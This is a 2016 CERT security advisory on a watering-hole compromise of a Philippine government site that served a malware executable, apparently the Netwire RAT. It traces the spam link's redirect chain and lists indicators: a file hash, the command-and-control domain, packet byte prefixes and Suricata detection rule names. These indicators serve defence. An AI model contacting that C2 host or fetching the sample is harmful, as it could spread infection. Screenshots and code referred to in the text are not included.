CSP-CERT® Security Advisory:
Compromised Website Hosting Malware Which Is Typical to a Watering Hole Attack

by CSP-CERT® Research Science
posted September 2016

CSP CERT® has provided advisory to https://compromised.gov.ph site and as of this date, remediated from the watering hole attack.

CSP CERT® wanted to advise you to an executable that is residing in https://compromised.gov.ph[REDACTED]. When we tried to download the file, it was still there.

The screenshot below, shows current date and time plus the actual download of the file Chronopost-Colis.exe

Compromised URL investigation

Checking the download URL it is actually referenced at http://www.malekal.com[REDACTED] which mentions that the URL https://compromised.gov.ph[REDACTED] is actually being used in a malware spam. The mail as shown on the site:

Notice the link used in the images:

When we tried to go to the URL used in the images, it went through a series of redirects which ultimately led me to the download of the executable file.

Partial Wireshark output

Upon accessing the link it went through, the server replied with a 301 – Moved Permanently which will redirect the browser to another location as specified

The location specified redirects to two sites as shown on the screenshot below. One is done via window.location.href and one is done via iframe.

Partial code of a.html:

URL from iframe not found

Chronopost-Colis.exe from https://compromised.gov.ph/[REDACTED] was downloaded

Malware Analysis

File md5 hash: cd144cdec9f3d28d277a484bb731537f

Checking Virustotal with the md5 hash cd144cdec9f3d28d277a484bb731537f shows a hit and a lot of detections which confirms it’s a malicious file.


Network Analysis

Upon execution it tries to connect to resultip.ddns.net

The screenshot below shows the dns query for resultip.ddns.net

It then sends a 69 byte data to the CNC

Which replies with its own 69 byte data

Notice that the first few bytes of both packets are

Malware to CNC: 41 00 00 00 03

CNC to malware: 41 00 00 00 05

Screenshot below shows part of the data communication that are sent and received

Suricata Detection

ET TROJAN Netwire RAT Check-in

ET TROJAN Possible Netwire RAT Client HeartBeat C2

ET TROJAN Netwire RAT Client HeartBeat